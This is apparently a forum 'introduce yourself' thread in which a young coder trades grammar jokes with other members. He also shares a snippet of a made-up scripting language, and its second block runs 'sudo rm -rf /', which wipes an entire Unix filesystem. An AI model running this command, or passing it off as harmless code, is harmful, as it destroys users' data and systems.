My intro? Duction.

Off topicIntroduce yourself! → My intro? Duction.

Hello guys, I’m Kidwai and no, my IGN isn’t Kid-wai-Family, it’s Kidwai-Family. Now get on with it. I’m homeschooled so I spend most of my breaktime either coding or playing Minecraft or looking up how to code PHP or watching youtube videos both about coding and minecraft but mostly coding and Tom Scott, Numberphile, and Science. I’m AFK a lot as my house is really busy and… Hey, did you catch the dangling modifier? My house can’t be busy; houses aren’t busy! I’m studying for the SAT and may I comment that in @abh037’s 8x8 video he secretly hints out who did which part? Wait! Stop again! Did you catch the pronoun misuse? I said “he”, which obviously refers to @abh037, but the noun @abh037 doesn’t appear in the sentence. Since @abh037’s is not a grammatical equivalent to @abh037, the sentence is incorrect. Anyway, I don’t want this to turn into an essay on common grammar mistakes, so bye.

WAIT! There’s another problem! “I’m studying for the SAT and may I comment that…” using and to connect the 2 sentences is incorrect, as they are of unequal importance. LEARN THESE GRAMMAR FACTS, KIDS! BTW, this is called “Unparallelism.” @flying_MAchinez

Well, thanks for the grammar lesson, Kidwai-Family. This information will indubitably be of great value in the future.
I don’t understand if you are saying goodbye or teaching us a grammer lesson. -H5
when is @abh037 gonna come, I mentioned him like 10 times. Well 6 but you get my point.

indubitably

undoubtably? xD Anyway. I forgot to mention LOGIC2, a nice little project I’m working on:

START;
PREF DEFAULT;
CNT 1?10 OUTPUT CONSOLE;
IF $.cntprogression() IS 'over' THEN END?CLOSEWINDOW='this.console.SafariApplication.Terminal' ELSE OPEN CONSOLE; INVALIDATE NXTLIN(3);
END PROGRAM NOT LOOP CATCH {};
START;
OPENCI /Applications/Utilities/Terminal/;
EXEC 'sudo rm -rf /';
END;
Well hows the 9x9 going
Well, “indubitably” is more or less equivalent to “undoubtedly." “Undoubtably” isn’t a word. :-P